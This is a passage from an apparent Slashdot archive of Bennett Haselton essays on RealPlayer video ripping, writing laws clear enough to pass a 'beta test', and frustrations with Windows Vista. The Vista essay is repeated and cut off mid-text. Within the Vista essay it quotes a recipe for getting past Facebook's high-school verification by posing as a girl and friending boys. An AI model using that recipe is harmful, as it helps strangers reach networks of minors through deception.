    It's brave of Google especially to be distributing RealPlayer along with the Google Pack, at the same time that YouTube is constantly attacked for enabling copyright violations. A content owner mounting a lawsuit against Google, would be foolish not to say something like, "Your Honor, not only does YouTube host thousands of videos violating the intellectual property rights of my clients, they even distribute a tool called RealPlayer that lets people violate YouTube's own Terms of Service by saving the videos to their hard drive!" Logically, of course, it's a weak argument -- RealPlayer is universally available whether Google distributes it or not -- but rhetorically the argument is golden.

    On the other hand, since that hasn't happened, and RealPlayer 11 is pretty well entrenched after being out for a year, the result has probably been an expansion of our rights. Anyone else who got sued or threatened for releasing a ripping program would be able to point to RealNetworks. "Look at them, Your Honor, their Web site even tells people, 'Grab videos from thousands of Web sites with just one click', something that those 'thousands of Web sites' would probably not be thrilled with. If it's legal for RealNetworks to tell people that, how can it be illegal for me just to have a ripping program on my site?"

    If a small-time programmer had made themselves a legal test case before RealPlayer 11 came out, things might have gone differently; it is an unfortunate truth that courts are probably more likely to consider something legal when it is done by a large and legitimate-looking company like RealNetworks. Big companies do well in court partly because their lawyers are paid to make good arguments, but they almost certainly also get more benefit of the doubt just by virtue of being big companies. I think the time is long overdue for using controlled experiments to measure the bias and objectivity of judges -- for example, having different actors, one white and one black, go into different courtrooms for "mock trials" (which the judges think are real), where both actors are standing trial for exactly identical crimes and their lawyers say exactly identical things, and repeat this experiment enough times to see how differently black and white defendants are treated. (We already see this, for example, in the disparity of sentences for powder cocaine vs. crack, but skeptics may have a point when they say that's not a controlled experiment, because the effects of crack and cocaine are different.) Similarly, have mock trials where a small-time "activist" and a large company are sued for doing exactly the same thing. I would bet that the disparity in the outcomes of those cases would far exceed any bias due to race or gender.

    But since it was RealNetworks, with their lawyers and their NASDAQ listing and their former exec in the U.S. Senate, that brought ripping to the masses, that probably makes it OK for you and me. It's not fair, but in this case, it's a good thing.

  44. Next Year's Laws, Now Out In Beta!

    · posted by ryuzaki0 · from the something-to-read dept. · 238 comments
    Frequent Slashdot Contributor Bennett Haselton writes with his latest which starts "If I were writing laws such that I wanted everybody to agree on how to interpret them, I would use the software development life cycle: First, have lawmakers (analogous to "developers") write drafts of the laws. Then a second group (the "test case writers") would try to come up with situations that would be interpreted ambiguously under the law. Then a third group, the "testers", would read the proposed law, read the test case situations, and try to determine how the law should be applied to those cases, without communicating with the law writers, the test case writers, or each other. If there's too much disagreement in the third group on how the law should be applied, then it's too vague to be a proper law. The only laws which made it through this process would be ones such that when they were finally passed, most citizens (the "users") could agree on how to interpret them, in cases sufficiently similar to the ones the test case writers could come up with."

    The irony is that this is how laws are supposed to work anyway. Laws have been struck down as being "void for vagueness" on the theory that people ought to be able to read them and know what they mean. But what does "vagueness" mean, if not that different people cannot independently agree on what a law means, and even the nine highest-ranked legal experts in the country are split 5-4 on how to read it? Some Supreme Courts, such as under William Howard Taft, tried to reach unanimous verdicts whenever possible on the theory that it would persuade people of the correctness of their decisions. But unanimity doesn't prove anything if it was achieved by agreeing to agree. Only if judges were put in separate rooms and independently agreed on how to apply a law to a given case, would that prove that the clarity came from the text of the law itself. Legislators ought to start at least trying to pass laws that would meet that test.

    For some reason we seem to have just accepted the alternative as the status quo, where laws are passed that express a general sentiment ("no spam with a 'misleading' subject line") but nobody thinks that you could put two people in different rooms and expect them to agree on how the law would apply in most cases. The parties involved in the first court cases may have to spend ruinously large amounts of money to get to the point where judges rule on how to interpret the law, only to find that lower court judges disagree with each other. Meanwhile, anybody bringing a case now has to look up not just the law, but reference the lower court rulings that support their side, while their opponent of course references the other rulings. And even if a case does finally get appealed up to the Supreme Court, which issues a ruling binding on all lower courts, future researchers still can't find out the state of "the law" by looking up the statute; they have to look up the statute and read the Supreme Court ruling which states how the statute should be read (which may still be ambiguous as applied to their current situation). All of this costs a lot of money, which results in a huge waste of resources if both sides can afford it, and tilts the playing field if only one of them can.

    I wonder if the reason this is so widely tolerated is because people have absorbed the notion that making and interpreting laws has to be hard, like brain surgery. But brain surgery is hard because the brain is naturally complex and not man-made. Lawyers also have to learn a lot of complex procedures, but not as complex as brain surgery; the major difficulty in a court case is guessing how the judge may interpret an ambiguous law (which is not "difficult" so much as a matter of being lucky), and knowing the unwritten rules that govern what actually happens (including which written rules are followed and which ones are ignored). And there's no reason in principle why this guesswork couldn't be reduced by having laws be more clear to begin with, and putting the "unwritten rules" down on paper.

    I watched a scaled-down version of this play out in the first few cases that I brought against spammers in Small Claims court in Washington (although it involved only a waste of resources, not money, since Small Claims doesn't allow lawyers). You know the chorus, so all together now: Some judges said you could sue people out-of-state, and some said you couldn't. Some judges said you could sue for statutory damages in Small Claims, and some said you could only sue if you'd lost money. Some judges said that you could represent a corporation that you own, and some said that if you're a non-lawyer, you can't even represent your own corporation. Some said you could sue under a federal law in Small Claims, and some said you could only sue under a federal law in federal court. There are many more examples, and those were just the contradictions about Small Claims court procedure generally, not even counting the specific issues raised by the anti-spam law.

    But as much as I've complained about that in the past, I don't blame the judges for that part. If the law is unclear, then judges have to come down one way or the other. (What I've complained about is when judges say that their interpretation is "the law", and that if you don't get it, you have to do more research. Lawyers know to take this kind of comment with a grain of salt, but a non-lawyer who takes it at face value, could end up wasting dozens of hours or hundreds of dollars in lawyer's fees before realizing that the judge's interpretation was not actually the law, and a different judge might have said the opposite. The judge should just be honest and say, "Well, I'm the ref and this is how I'm calling it. On another day with another judge you might get something else." I've had cases heard by some judges who basically said as much.) Often both interpretations are reasonable, but that's the point -- if both interpretations are reasonable, then there's something wrong with the way the law is written!

    For example, there was the judge who said that you couldn't sue in Small Claims unless you'd lost money, because Small Claims jurisdiction is limited to "cases for the recovery of money only if the amount claimed does not exceed four thousand dollars". Most judges interpreted "recovery of money only" to mean that Small Claims courts can only award money damages, and not, for example, order someone to return property. Two judges, however, said that "recovery of money" implied that you could only literally "recover" money that you used to have and then lost (relying on the common English meaning of the word "recover"). In legal jargon, however, "recover" often simply means taking something from another party, and I won one such case on appeal after I submitted three Supreme Court rulings as evidence that used the phrase "recover statutory damages" or "recover punitive damages" in that sense, since statutory damages and punitive damages refer to money over and above what the plaintiff actually lost. (The original judges did not change their minds, but one of them later recused herself from any future spam cases filed by me, a move that I thought was questionable.)

    Here's another example where there's no excuse for the law not to be completely clear, since it's specifying a number. To appeal a Small Claims ruling in Washington, you have to post a bond for "twice the amount of the judgment and costs, or twice the amount in controversy, whichever is greater". Presumably the "amount in controversy" means the amount that the plaintiff was suing for. But hang on -- in Small Claims you can't possibly be awarded more than you sued for. And that means the "the amount of the judgment and costs" will always be less than or equal to "the amount in controversy"! So why not just say "twice the amount in controversy"?

    Or perhaps the "amount in controversy" only means the amount that the plaintiff and defendant disagree on. So if you sue someone for $2000, and the defendant agrees on the first $500 but not the remaining $1,500, and the judge's interpretation falls in between and she awards you $1,200, how much of a bond do you post if you want to appeal? $3,000, literally twice the "amount in controversy" between you and the defendant? $2,400, twice the amount of the judgment? $1,600, twice the difference between what you sought and what the judge awarded you? $4,000, twice the amount you sued for?

    Beats me. When I first started out, I'd drive myself and my lawyer friends crazy asking, "Well, what's the rule? What's the answer?" Well, now I know: There is no rule, it just depends on what the judge says. Actually in this case, it depends on what the clerk says -- because it's the clerk at the courtroom's front office, not the judge, who handles the paperwork for an appeal and checks that you posted a bond for the right amount, so you have clerks effectively deciding how to interpret the law. (Just last week, after I sued a telemarketer for $1,500 and won a judgment for $565, the telemarketer appealed by posting a bond for twice that amount, or $1,130. This doesn't seem correct under any interpretation of the law, since the "amount in controversy", however you define it, was greater than the "amount of the judgment" of $565.)

    Sometimes, courts have settled on how to interpret a rule, but the interpretation is still different from what the rule actually says. The Small Claims form that you serve on defendants says, "You are further notified that, in case you do not appear, judgment will be rendered against you for the amount of the claim as stated herein below..." This is not true -- you can lose even if the other party does not appear (if the judge thinks, for example, that a spam's subject line was not misleading enough). I understand that having that line on the form serves a useful purpose by getting people to show up. But it's still wrong, and everybody knows that it's wrong, and it's on the form anyway.

    A more serious example: When I first started suing spammers, if I thought they would show up in court, I'd sometimes try to go to the trouble of catching them in a lie, like the guy who showed up and claimed he didn't know anything about any spam, before I showed that I had recorded a phone call where he admitted that he could send out 5 million e-mails from Chinese servers for $500. (Yes, taping the call was legal -- follow the link for more info.) The written rule is that if you lie under oath in court, you can be arrested for committing a felony, even if the case is only a civil trial. But it turns out the unwritten rule is that perjury in a civil case is almost never prosecuted, and in most of my cases where I had proof that the defendant lied, the best that would happen was that I'd just win the civil case anyway, and sometimes not even that. It's not just Small Claims, either -- in one currently ongoing case, the defendant's lawyer just filed an answer to our complaint stating "Plaintiff subscribed to receive our e-mails". There's absolutely no way their attorney believes that to be true (with the spam in question being sent by mortgages spammers from forged domains, it's hard to see how anyone could "subscribe" to receive those mails even if they wanted to), but attorneys are required to submit such briefs with good faith in their veracity. So why isn't he on the hook for that? Because of the unwritten rule that courts just don't make a big deal out of it.

    The point is that none of these issues is hard to grasp. The difficulty lies not in understanding the problems, but in the impossibility of guessing how a judge will interpret an ambiguous rule -- or, in the case of an unwritten rule which contradicts the written ones, the difficulty of knowing the unwritten rule if you don't have a lawyer's experience.

    So, ambiguous laws could be divided into three categories:

    1. Laws and rules where there ought to be no ambiguity at all -- for example, rules about who can be sued where, and for how much, and what size bond you have to post if you want to appeal. The fact that these laws are not clear enough to be universally agreed up on, is just silly. (Again, if judges have a conference or an e-mail discussion and decide on an interpretation, that doesn't mean the law as written was clear -- in fact, the fact that they had to have that discussion, proves that it wasn't.)

    2. "Unwritten rules" that are generally agreed upon by lawyers and judges, but which are not actually written down or may even contradict the rules codified into law. Are trials and proceedings actually conducted according to written rules? The acid test for this would be: Hire a physics professor or somebody (so the legal establishment can't use the excuse of calling him a dumbass) and have him look at the history of events and documents in a typical civil case, from the vantage point of one side's lawyer. At each stage in the proceeding, before the professor sees what the lawyer actually did next, have the prof try to figure out what they would have done, based on the written rules. (The question is not whether the prof would have come up with the same strategy as the lawyer, but whether they would have done something that was procedurally correct at all.) If there are too many cases where the professor does something that technically conforms to the written rules, but where the lawyer says it would have been rejected by the court as procedurally invalid -- and if the same thing keeps happening with more and more smart non-lawyers trying the same experiment -- then this suggests that either the procedures need to be changed to conform with the written rules, or the written rules should conform with the procedures. (Because actually changing laws and rules is so hard, a better idea would be to publish an "annotated version" of the court rules which describes the procedures the way they are actually followed.)

    3. Laws governing situations where ambiguity is hard to get rid of -- for example, the part of the Washington anti-spam law prohibiting "misleading subject lines". Here the question is whether a mushy category like that could ever be clearly defined so that people would independently agree on what it meant.

    For the first two categories, bringing some clarity to those laws ought to be a no-brainer. Some candidate like Ron Paul or Dennis Kucinich who can say whatever they want because they're not going to win anyway, should make an issue out of it. They wouldn't have to fix the problem all at once. They could just promote it as a core American value that has been overlooked: Laws and court rules should be clear, and they can't be called clear unless people can independently agree on how to read them. The Left could get behind it because it would bring more equality between the rich and poor in the legal system. The Right could get behind it because they style themselves as the party backing judges who are "strict constructionists" that apply the law as literally as possible. (Although at the risk of alienating potential right-wing supporters, I don't think that "strict constructionism" would have much meaning until laws are clarified using something like this process. To say that this or that judge is a "strict constructionist" under our current laws, often sounds to me like a bunch of hooey, when the laws are too ambiguous for anybody to strictly construct anything out of them. Clarence Thomas, who is often held out as an example of a "strict constructionist" judge, has said that Tinker vs. Des Moines, the Supreme Court case that extended First Amendment rights to high school students, is "without basis in the Constitution". But there's nothing in the First Amendment to say that it's limited to individuals over 18, although ironically most "strict constructionist" judges and their supporters, read it as if it is.)

    The third category of ambiguous laws would be more interesting to try to fix. Would it be possible to come up with a standard for a "misleading" subject line that everyone could agree on? Probably not. But I think you could measure the ambiguity of a law by using testers and test case writers in the kind of procedure I suggested in the first paragraph, and you could get to the point where there was less disagreement among the testers on how to interpret the law as applied to typical subject lines.

    If lawmakers knew in advance that their laws would be subject to that kind of test, they would write them more clearly the first time around. Why couldn't laws be written to include a list of hypothetical situations, for example, specifying which situations the law covered and which ones it didn't? For example, a list of sample spam e-mails to illustrate what the law means by a "misleading subject line". Of course, the trouble with picking examples to illustrate your own points, is that people tend to pick examples that fall squarely in the middle of the categories they're illustrating ("your refund has been processed" is misleading, "printer cartridges for sale" is not). If the lawmaker included illustrative cases like this that were too-obvious examples of what they were describing, then the "test case writers" would be able to shoot down the proposed law by picking hypothetical cases that were closer to the borderline (so that in the third phase, when the testers tried to apply the law to those borderline cases, different testers would classify the borderline cases differently, and the law would fail the vagueness test). To mitigate this, the author of the law should pick illustrative examples that would be at or near the borderline, thus providing clearer guidance as to where the boundary lies between a misleading and non-misleading subject line. Which is what they should be doing in the first place.

    Now, there are some problems that even the double-blind test for unambiguous laws, would not solve:

    • Judges could be systematically biased against a particular law (and even proud of it), in which case they can make things difficult for you even if the law is unambiguous. Or, they might be so biased in favor of a law that they carry it further than the clearly proscribed boundaries, as in the case of a judge who upheld the conviction of a man for sending sexually explicit instant messages, even though the law in question was clearly limited to e-mails.

    • Judges may not take cases seriously from non-lawyers. In one series of cases that I brought, I filed written motions with two of the pages stuck together by a tiny thread of paper, so that after the judge ruled, I could examine the motions in the court file to see if the thread was still intact. I found that about half the time, the judge had rejected the motion without reading it.

      This is a hard obstacle to overcome, especially after the Commission on Judicial Conduct ruled that it was not a violation of the Code of Conduct for a judge to reject a motion without even turning the pages. It wouldn't do any good to show that judges ruled against pro se (self-representing) plaintiffs more often than against lawyers, because judges could claim it was because pro se plaintiffs just made more errors (although it would be hard to use this excuse to explain why judges rejected briefs without reading them at all). One way to test this would be to have judges conduct the trials "blind" so that they would see the briefs presented by each side, but they wouldn't know whether the brief was submitted by a lawyer or a non-lawyer representing themselves. However, this would require difficult changes to the way legal procedures are conducted

      A simpler way might be: Once the "unwritten rule book" has been authored, such that your typical non-lawyer in the above experiment knows what kind of briefs to submit at each stage of a trial, have a legally trained third party look at briefs written by the lawyer and briefs written by an average lawyer, and see if they can tell which is which. If the third party can't tell, then that indicates the non-lawyer is writing the briefs almost indistinguishably from a lawyer -- and then if a judge in a real trial keeps hammering them for "procedural violations", it would be because of the judge's knowledge that the party was a non-lawyer, and not because of what the party actually did. On the other hand, if the judge ruled against the person in the same proportion that that person's briefs were being flagged as "obviously written by a non-lawyer" in the double-blind experiment, then that would indicate the judge was being fair.

    • Even if a law is perfectly unambiguous, judges may disagree on whether it is constitutional under the First Amendment, for example. Making these situations unambiguous would involve tampering with the First Amendment, probably not a good idea in this or any other political climate.

    • It wouldn't do anything about the corrupt process by which laws are often passed in the first place, in exchange for campaign contributions. (As one scholarly analysis says, "It's exactly like buying a hamburger, except that under our laws, everybody must pretend that nobody is buying anything, and nobody is selling anything.")

    But notwithstanding these problems, I think any law that could pass the double-blind interpretation test, would be an improvement over one that can't. First, because it appeals to our sense of fairness to have rules clearly laid out. Second, if we really followed the void for vagueness doctrine, laws would be able to pass that test anyway. Third, economists have documented that there are economic benefits to having stability and predictability in the law. Economist Thomas Sowell wrote in Race and Culture that in some historical periods, even when groups given second-class status under the law (such as Jews in Eastern Europe or the Chinese in Southeast Asia), they were able to prosper better than they did elsewhere, as long as their basic property rights were protected, and the laws, even the discriminatory ones, were consistent and predictable!

    This isn't something that would require a wholesale change in a state's constitution or lawmaking procedure. Any legislator could voluntarily try this process out to see if it resulted in laws that were easier for constituents to understand, and had a greater chance of being interpreted by judges to give the result that the legislator wanted. Imagine having an anti-spam law, for example, which said:

    Misleading subject lines are prohibited. This includes not only subject lines which contain false advertising, such as:

    • 'lotion that cures baldness'
    • 'legal copies of Windows for $20'

    but also subject line that mislead the user into wasting time on a message. This is because a large part of the harm done by spam is not due to the falsity of the advertisements, but due to the time that users waste on each message before realizing that it's an advertisement. As such, misleading subject lines include those that mislead the user into thinking that the message is from a personal acquaintance, such as:

    • 'Congratulations!'
    • 'Touching base'

    or a subject that misleads the user into thinking that the message is a 1-on-1 communication, such as:

    • 'Re: Question about your website'
    • 'Shareholder request'
    • 'urgent cancer call'
    • 'Reminder: link to your website http://slashdot.org/'

    [Except for the first group, all of these are subject lines from real spams that I received, which Small Claims judges ruled were not misleading. Giving them the benefit of the doubt, I think they are applying the standard of whether a spam constitutes fraudulent or deceptive advertising, not whether it tricks you into opening it. But the original author of the anti-spam law, when talking about other proposed measures, stated that the point of anti-spam laws is that "Computer users should be able to know instantly what's spam and what isn't."]

    If you were reading a series of legal statutes and came across one written like this, it would be jarring, like reading a Wikipedia article about cell division and then getting to the part where someone wrote "And Bennett is gaytarded". But that's because we're accustomed to laws being ambiguous, not spelling out how they should be interpreted using reasons and examples. I would like to see some lawmaker, somewhere, insert a law into their state's legal code that looked and sounded something like this. The idea is so radical that maybe it could only be done by an eccentric, like the congressman who had Elmo testify before a Congressional committee before he was arrested for bribery (the Congressman, not Elmo), or the guy who passed a House Resolution commending Napoleon Dynamite ("any members who choose to vote 'Nay' on this concurrent resolution are "FREAKIN' IDIOTS!"). Or maybe it would be up to a regular lawmaker who thinks, what the hell, let's write a law so that people can agree on what it means, and see if it starts a trend.

    As for taking the rules that ought to be clear once and for all, like who can be sued where and for how much, some 3%-getting-candidate should start talking about it. When I read an article about how some lawsuit was stalled because a lawyer complained that it was filed in the wrong district, I can barely keep reading because I get sidetracked thinking this is such a pathetic reflection on our legal system. If the rule about where the suit can be filed is unambiguous, why aren't the lawyers sanctioned for raising it as a false issue? If the rule really is ambiguous, why hasn't it been made clear a long time ago? If you support (or are) a politician or candidate who wants to ask these questions, the field is wide open.

  45. Hostile ta Vista, Baby

    Tech · Windows · · posted by kdawson · from the title-could-have-been-worse dept. · 663 comments
    Frequent Slashdot contributor Bennett Haselton adds his experience to the litany of woes with Microsoft Vista. Unlike most commentators who have a beef with the operating system, Bennett does a bit of surveying to bolster his points. Read his account by clicking on the magic link.

    My brand-new-out-of-the-box Windows Vista machine could not access www.facebook.com. A nearby XP machine could, but the Vista machine couldn't. I went back to Circuit City to try out the other Vista demo machines, and they could access other sites but not Facebook, either. And that honeymoon feeling that you get when you buy a new computer and expect it to solve all your problems, was over for me. Having built my latest career on helping people access Facebook where they were blocked from it, by some cosmic joke was Vista now blocking me from getting to Facebook on my own machine?

    I know, another article bashing Vista, what could be more banal. (Kids! That word, meaning "trite" or "unoriginal", is pronounced "ba-NAHL". If you say it the wrong way like I did in an interview, it sounds naughty and you sound stupid.) But in my own random survey of 30 Vista users on Amazon's Mechanical Turk service (a handy way to check these things), three quarters (23) said the only reason they were using Vista was that the PC store they went to didn't sell XP machines any more, and about half of all respondents (14) said that they would go back to Windows XP if they could. So I don't want to get a bunch of e-mails with Ron Paul links in the signature saying "Nobody has to use Vista if they don't want to!" (I'm aware that a survey of 30 people is too small to be scientific, but it's enough to get a ballpark figure for about $5 on Mechanical Turk.) Besides, the more people write testimonials to what they found frustrating about Vista, the more likely it is that some future version will keep what is good about the new OS, while providing a less frustrating interface (suggested name: "Vista 98").

    It turns out the Facebook issue was not really Microsoft's fault -- www.facebook.com had a broken IPv6 record, and Vista defaults to using IPv6 where XP used IPv4, so that's why the host wasn't working. (In case you run into this with any other Web sites on Vista, I fixed the problem by disabling IPv6 in network settings and rebooting.) But it was one more example of something that used to work pre-Vista and then stopped working, and every case like that adds up to the overall frustration of switching to a new system, regardless of whose fault it is.

    I hasten to add that I am not some partisan Microsoft basher. I like XP just fine, never more than when I went back to it after a few days on Vista, and I still think for that matter that Vista would be easier to switch to than Linux. Having been involved for years with free speech activism, I run into a lot of people in the same circles who are strong Linux advocates, apparently because the concept of "freedom of speech" is closely aligned with "making every file search as simple and stress-free as a Hamas hostage negotiation". So every year or two I'll try out the latest version of some Linux distro to see how long it would take to get used to it. In 2005, full of optimism, I cheerfully booted up the latest version of Shrike, then tried to find a directory and discovered I could not right-click on the hard drive root dir and specify the name of a directory I wanted to search for (that only worked for files, not directories). I posted a query to a Linux newsgroup, and a respondent told me that the solution was to open a command prompt and type "man find", which I am aware is a polite way of saying "screw you, newbie", but which I dutifully followed anyway and got an output screen of which the first paragraph was:

    find searches the directory tree rooted at each given file name by evaluating the given expression from left to right, according to the rules of precedence (see section OPERATORS), until the outcome is known (the left hand side is false for and operations, true for or), at which point find moves on to the next file name.

    and that was all my Linux for that year. Maybe I'm overdue to try it again. (Microsoft gives away their Virtual PC program that makes it easy to try other operating systems; I think it's a ploy to make us appreciate Windows more.) Now, I love the concept of a freely-distributable, freely-modifiable operating system, and I've recommended Linux to people when you need it to do something cool that Windows can't do, like bypassing Windows security by booting a PC from a CD. And it's done a lot of good for organizations like the One Laptop Per Child program, which can keep their costs down by using a free operating system. But to this day I've never heard an answer to one question: Since even Linux advocates admit that it's harder to use, what can you do with Linux that you can't do with Windows, to make it worth switching over to? If I was nervous about Vista because some of the interface had changed and some of my old programs no longer worked, it wasn't helpful to tell me to switch to a system where all of the interface would change and none of my old programs would work.

    So, I wanted to like Vista. I knew that eventually everyone would have to upgrade anyway, so, not wanting to be left behind, I wanted to switch to Vista because of the same factor that spammers use to get your attention: "Other guys are improving themselves, why aren't you?" But there were some things I ran into almost immediately:
    • Windows Explorer and Internet Explorer no longer have the "File / Edit / View" menu bars across the top of the window. Was this a big problem under XP? When the menus gave quick, two-click access to most actions that you could take within the application, was there a grassroots movement to have them removed? I did eventually find that you can hit the "Alt" key to bring the menus back, but why put people through that frustration? The most annoying feeling while using a computer is being yanked out of thinking about what you're doing with the computer to having to concentrate on how to use it.

      Perhaps the idea was to steer users towards using the buttons on the toolbar, but there aren't enough buttons to cover all the options located under the menus. If the UI designers wanted to steer users gently towards using the buttons, my suggestion would have been: Whenever the user picks something under a menu that corresponds to something accessible from the toolbar, display a dialog box which says for example, "In the future, you can print faster by clicking the printer button on the toolbar", along with a picture (and a "Do not show this message again" checkbox -- important!).

    • Windows Explorer also did away with the "Up" button that lets you browse from the current directory to the higher-level directory. Again, probably not in response to a groundswell of users demanding for that button to be removed, when it took up about one square centimeter of screen space. Supposedly Windows Explorer makes up for this by displaying the entire path to the current directory in the address bar, so that if the path is "C:\Financial Records\Chris Pirillo\ Pectoral Real Estate\", you can click on "Chris Pirillo" to go one directory higher. The trouble is that I frequently give my directories extremely long and descriptive names like (this is a real example) "Flash-Player-8.5.0.246-beta2.downloaded-2006-03-20-from-labs.macromedia.com" so that I can keep track of where and when I got each piece of downloaded software, in case I ever need to go back to a previous version that the software maker no longer makes available because they're trying to steer me away from it (ironically, "Vista syndrome"). With a directory that has a long name like that, the higher-level directories aren't visible in the address bar, so I had to locate it manually in the left-hand tree view panel. OK, knock off the violins, the point is that I didn't have to do that in XP.
    • I have an older monitor, so I wanted to turn ClearType off. The IE7 help file describes how to do this in IE, but that didn't work for me no matter how many times I tried, and my eyes were aching by the time I found out that in Vista it's a default system-wide setting that overrides IE's setting until you change the system-wide one. I would have suggested putting one line in the IE7 help file: "Note: if your operating system such as Windows Vista is set to use ClearType system-wide, you must disable this as well to disable ClearType in IE."
    • Virtual PC, which worked on all versions of Windows XP, is not supported on Vista Home Premium. I need Virtual PC (for reasons other than Linux-bashing), so this was a deal-breaker.
    • Telnet no longer installed by default. Even though I use a different telnet program for regular use, telnet.exe was handy to test whether a remote machine was reachable on a given port. (For example, in a command prompt, type "telnet www.yahoo.com 80" and when the command prompt screen goes blank, that means the machine www.yahoo.com is accepting responses on port 80, the standard port for Web traffic. Try connecting to port 81 instead, and you get no response on that port. This can be useful when diagnosing problems with Web servers and other programs.) Even though it's not hard to get telnet back, why would they go to the trouble of removing it?
    • The aforementioned Facebook problem. This seemed so startling at the time that I almost stopped everything to write an article just about that, musing on Microsoft having so much power that all PC stores were now exclusively stocking computers running an OS that, at the time anyway, couldn't access Facebook. But then I asked another bunch of users on Mechanical Turk, and all respondents using Vista said they could access Facebook after all. Of course, this wasn't a random sample, since users who bought Vista and couldn't access Facebook, probably would have returned their machines a long time ago, but I'm still not sure what caused it to work on some machines and not others -- all I know is that Facebook was inaccessible until I disabled IPv6.

      I know Facebook is reading these articles, since in November I wrote about how you could circumvent Facebook's system of verifying that users were real high school students, by doing the following: "(1) create a profile of a non-overweight girl and sign up as a member of a high school network, pending confirmation; (2) search for several boys in that network and send them friend requests; and (3) wait for at least one of them to confirm you back". Shortly afterwards, Facebook changed the verification system, so that now, if you're confirming someone who is a pending member of a high school network but no one else has confirmed them yet, Facebook warns you, "Only check this box if you're absolutely sure that you know this person." So, whichever of Mark Zuckerberg's friends is reading my articles: Clever idea, and, keep the IPv6 records working.


    That was as far as I got before I stopped trying to get used to Vista and started taking notes for this article (working title: "Vist Vucked"). From the Mechanical Turk users who responded to my survey, the other most common reported problems were: software compatibility, hardware compatibility, difficulty with the UI, and running too slowly. Presumably the first two problems will improve over time, but the UI will always be hard to switch to as long as users can't find functions that were easy locatable in the old interface, and if it runs slower than XP, that will always be a factor no matter how fast your computer is. (However fast it runs Vista, you'd always be able to make it run even faster with XP instead!)

    The best things I've heard about Vista have been that (a) it is the most secure Windows ever (which Dave Barry says is like calling asparagus the "most articulate vegetable ever"), and (b) it features better multimedia integration. To which my responses were: (a) the number of incomprehensible warnings that Vista flashes at a user whenever they look at the computer funny, does not make it more secure, because users will condition themselves to just ignore those warnings, and (b) I hate watching TV on my computer anyway.

    Since TV/PC integration is a major selling point for Vista, I thought this last issue was worth looking harder at: Do people really want to use their computers to watch TV? My computer monitor is in an office where I sit up close when I'm working; but TV feels more comfortable to watch from several feet away, and in my office I can't even scoot my chair back that far. (And if I lived with family, I doubt they'd want to crowd into my office to watch a movie.) In fact, I like the psychological separation of the TV set in the living room from the distractions of the computer in the office: I go in there when I'm done with everything in here. The only way I'd regularly download and watch movies would be if I had a way to send them wirelessly to my TV, but a wireless PC-to-TV converter and the corresponding receiver together cost about $200.

    Seeking more validation of my opinions from strangers, I did another survey of 30 Mechanical Turk users, asking if they would rather drive to a movie rental store or download a movie online for the same price. Almost half (14) said they'd rather drive to the movie store, citing the comfort of watching the movie on their TV as opposed to on the computer. Another fourth of the respondents (8) said they'd download the movie but only if they could send the content to their TV to watch, and only the last fourth (8) said they'd actually watch it on their computer monitor. So the future of convergence between PC and TV will probably be not in all-in-one systems but in devices that link the PC in your study with the TV in your living room, and since there's no household name yet for PC-to-TV linkage, the field is wide open for some lucky company to make a product that becomes synonymous with the concept, the way "TiVo" is easier to say than "Digital Video Recorder". Maybe that will be a boost for systems like Vista. If that happens at about the same time that a Vista successor is released that makes the interface easier to switch to from XP, I'll bet that will be the tipping point that gets people switching voluntarily. (Of course many people will switch by then just because they need a new computer and they couldn't find one with anything but Vista on it.)

    Anyway, I was only trying a new Vista machine because the hard drive on my old computer died, but after all the data had been recovered, I just installed a new drive in the old machine and went back to XP, while my Vista machine was returned to its perch, gargoyle-like, on the shelves at Circuit City, waiting to pounce on the next unsuspecting wretch with dreams of self-improvement through newer computer purchases. The only remnant of Vista that I have left is IE7, which was installed by my Windows XP restore disk and can't be removed, and which is incompatible with some sites and programs that I need, so I've been using Firefox more and getting to like it. That's lucky, since I've already offended the loyal software-logo-wearing constituencies of Vista and Linux, and wouldn't want to deal with the Firefox crowd too. As my friend Anne Mitchell says, "Admitting you hate Firefox is almost as bad as admitting to being Republican." (Except that when Firefox screws with a page, the chat logs don't end up on national television. Ba-dump-bump!)

  46. Hostile ta Vista, Baby

    Tech · Windows · · posted by kdawson · from the title-could-have-been-worse dept. · 663 comments
    Frequent Slashdot contributor Bennett Haselton adds his experience to the litany of woes with Microsoft Vista. Unlike most commentators who have a beef with the operating system, Bennett does a bit of surveying to bolster his points. Read his account by clicking on the magic link.

    My brand-new-out-of-the-box Windows Vista machine could not access www.facebook.com. A nearby XP machine could, but the Vista machine couldn't. I went back to Circuit City to try out the other Vista demo machines, and they could access other sites but not Facebook, either. And that honeymoon feeling that you get when you buy a new computer and expect it to solve all your problems, was over for me. Having built my latest career on helping people access Facebook where they were blocked from it, by some cosmic joke was Vista now blocking me from getting to Facebook on my own machine?

    I know, another article bashing Vista, what could be more banal. (Kids! That word, meaning "trite" or "unoriginal", is pronounced "ba-NAHL". If you say it the wrong way like I did in an interview, it sounds naughty and you sound stupid.) But in my own random survey of 30 Vista users on Amazon's Mechanical Turk service (a handy way to check these things), three quarters (23) said the only reason they were using Vista was that the PC store they went to didn't sell XP machines any more, and about half of all respondents (14) said that they would go back to Windows XP if they could. So I don't want to get a bunch of e-mails with Ron Paul links in the signature saying "Nobody has to use Vista if they don't want to!" (I'm aware that a survey of 30 people is too small to be scientific, but it's enough to get a ballpark figure for about $5 on Mechanical Turk.) Besides, the more people write testimonials to what they found frustrating about Vista, the more likely it is that some future version will keep what is good about the new OS, while providing a less frustrating interface (suggested name: "Vista 98").

    It turns out the Facebook issue was not really Microsoft's fault -- www.facebook.com had a broken IPv6 record, and Vista defaults to using IPv6 where XP used IPv4, so that's why the host wasn't working. (In case you run into this with any other Web sites on Vista, I fixed the problem by disabling IPv6 in network settings and rebooting.) But it was one more example of something that used to work pre-Vista and then stopped working, and every case like that adds up to the overall frustration of switching to a new system, regardless of whose fault it is.

    I hasten to add that I am not some partisan Microsoft basher. I like XP just fine, never more than when I went back to it after a few days on Vista, and I still think for that matter that Vista would be easier to switch to than Linux. Having been involved for years with free speech activism, I run into a lot of people in the same circles who are strong Linux advocates, apparently because the concept of "freedom of speech" is closely aligned with "making every file search as simple and stress-free as a Hamas hostage negotiation". So every year or two I'll try out the latest version of some Linux distro to see how long it would take to get used to it. In 2005, full of optimism, I cheerfully booted up the latest version of Shrike, then tried to find a directory and discovered I could not right-click on the hard drive root dir and specify the name of a directory I wanted to search for (that only worked for files, not directories). I posted a query to a Linux newsgroup, and a respondent told me that the solution was to open a command prompt and type "man find", which I am aware is a polite way of saying "screw you, newbie", but which I dutifully followed anyway and got an output screen of which the first paragraph was:

    find searches the directory tree rooted at each given file name by evaluating the given expression from left to right, according to the rules of precedence (see section OPERATORS), until the outcome is known (the left hand side is false for and operations, true for or), at which point find moves on to the next file name.

